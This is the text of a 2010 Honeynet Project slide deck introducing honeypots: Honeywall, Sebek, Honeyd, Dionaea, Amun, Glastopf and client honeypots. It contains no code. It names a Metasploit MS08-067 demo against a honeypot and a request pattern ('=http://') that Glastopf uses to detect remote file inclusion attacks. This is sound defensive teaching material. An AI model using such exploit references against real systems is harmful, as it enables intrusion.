Honeypots
Adel Karimi The Honeynet Project
Nov 14, 2010
USE
TO KNOW YOUR ENEMIES
Speaker
Adel Karimi
Member of The Honeynet Project (Iranian Chapter Lead)
Editor-in-chief of Snoop Security Ezine
M.S. Student @ Tehran Polytechnic
…
Agenda
• About The Honeynet Project
• Introduction to Honeypot
• High-Interaction Honeypots
• Low-Interaction Honeypots
• Client Honeypots
The Honeynet Project
• Founded in 1999, The Honeynet Project is an
international, non-profit research organization
dedicated to improving the security of the Internet at
no cost to the public.
• We accomplish this goal in the following three ways:
– Awareness - We raise awareness of the threats and
vulnerabilities that exist in the Internet today
– Information - For those who are already aware and
concerned, we provide details to better secure and defend
your resources
– Tools
~ 40 International Chapters
Iranian Honeynet Chapter
Honeynet Project Challenges
• Learn about threats, analyze attacks, and share
findnings..
//honeynet.org/challenges
• Past Challenges: – Challenge 6 - Analyzing Malicious Portable Destructive Files
– Challenge 5 - Log Mysteries
– Challenge 4 - VoIP
– Challenge 3 - banking troubles
– Challenge 2 - browsers under attack
– Challenge 1 - pcap attack trace
Honeypots
• Definition: A honeypot is a security
resource whose value lies in being probed,
attacked, or compromised.
- Lance Spitzner
• Has no production value, anything going to
or from a honeypot is likely a probe, attack
or compromise
Honeypots
• Uses of honeypots – Slowing down and following incoming attackers
– Catching and analyzing 0-days, malwares, botnets,
and so on
– Improving intrusion detection systems
• SurfIDS
• Nebula (An Intrusion Signature Generator)
“To learn the tools, tactics and motives involved in
computer and network attacks.”
SurfIDS
Features: • Distributed sensors, Central honeypot deployment, Central logging.
Honeypots
• Honeypot vs. IDS
• Honeynet:
– A network of [High-Interaction] honeypots
– Main requirements:
• Data Control
• Data Capture
• Data Analysis
• Data Collection
Types of Honeypots
• Production vs. Research honeypots:
– Production honeypots protect an organization,
while research honeypots are used to learn.
• Different Types:
– High-Interaction
• Real environment
– Low-Interaction
• Simulated resource(s)
• Physical vs. Virtual !?
High-Interaction Honeypots
• Honeywall For capturing, controlling and analyzing attacks
– It creates an architecture that allows you to deploy both LI
and HI honeypots, but is designed primarily for HI.
– Layer 2 bridging device (Based on CentOS 5)
– Tools:
• IPtables
• Snort_inline
• Snort
• Hflow
• P0f
• Argus
• Sebek
• Walleye
Honeywall
Walleye web interface
High-Interaction Honeypots
• SEBEK
– For “data capture”
– Hidden kernel module that captures all
activities
High-Interaction Honeypots
• Qebek (QEMU Sebek) – A QEMU based HI honeypot monitoring tool which
aims at improving the invisibility of monitoring the
attackers’ activities in HI honeypots.
– Two techniques: Virtual machine introspection (VMI)
and system view reconstruction (SVR).
– VMI enabled the IDS or other security system to monitor the
system events from outside the virtual machine, while SVR
allows the monitoring system to reconstruct meaningful high OS-
level information from the raw hardware-level information
generated by VMI
• Read the recently published KYT paper, “Qebek - Conceal the Monitoring” - The paper is available from http://honeynet.org/papers/KYT_qebek
Low-Interaction Honeypots
• Honeyd – Written by Niels Provos in 2002.
– Available at www.honeyd.org
Features:
• Simulates thousands of virtual hosts at the same time
• Configuration of arbitrary services via simple configuration file
• Simulates operating systems at TCP/IP stack level
• Tarpit
• Dynamic templates
• Subsystem virtualization:
– Run real UNIX applications under virtual Honeyd IP addresses
Low-Interaction Honeypots
• Nepenthes
– Nepenthes is a versatile tool to collect
malware. It acts passively by emulating
known vulnerabilities and downloading
malware trying to exploit these vulnerabilities. (Excerpt from Nepenthes website)
– Nepenthes is outdated
• Do not use Nepenthes, use Dionaea instead.
• Read why: http://carnivore.it/2009/10/27/introducting_dionaea
• PHARM - is a client/server tool to manage, report and
analyze all your distributed nepenthes instances from
one interface.
Low-Interaction Honeypots
• Mwcollect – mwcollectd is a versatile malware collection
daemon, uniting the best features of nepenthes and
honeytrap.
Low-Interaction Honeypots
• Dionaea
– Nepenthes successor
– Dionaea intention is to trap malware exploiting vulnerabilities exposed by services offerd to a network.
• Features: – Static state machines to emulate vulnerable service
– Pattern matching to extract values from shellcode
– Download copies of the attacking worm
– Store on disc, or submit to a sandbox
Dionaea
• Features:
– Implement required parts of the SMB protocol
– Uses libemu (Beyond pattern matching)
– Less services, better emulation and better logging..
Low-Interaction Honeypots
• Amun – A Python Honeypot
– Basically a nepenthes port to python
Amun
• A sample of collected attack data from Amun:
Amun
DEMO
//Using Metasploit to Launch an Attack against Amun (MS08-067)
Source: http://amunhoney.sourceforge.net
Low-Interaction Honeypots
• A new approach..
• Glastopf – A dynamic, LI web-app honeypot
– A minimalistic web server written in Python
– Collects information about web application-based attacks like RFI, SQL injection, and LFI
– Glastopf scans the incoming request for strings like “=http://” or “=ftp://” Try to download and analyze the file and respond as close as possible to the attacker's expectations
– The attacker sends us for example a bot, shell or spreader
Client Honeypots
• What is a HoneyClient!?
• Drive-by Download Attacks
Source: http://www.honeynet.org/papers/mw Source: Canadian Honeynet Project
Other Types of Honeypots
• WiFi Honeypot
• VoIP Honeypot
– VoIP Honey
– Artemisa
• SSH Honeypot
– Kippo
– Kojoney
• …
Conclusion
• You can use Honeypots to know your
enemies..!
– Collecting Malwares
– Tracking Botnets
– …
Virtual Honeypots: From Botnet
Tracking to Intrusion Detection
By Niels Provos, Thorsten Holz
Use Honeypots to Know Your Enemies
By Adel Karimi Iranian Honeynet Chapter adel.net at Gmail.com
Thank You..
?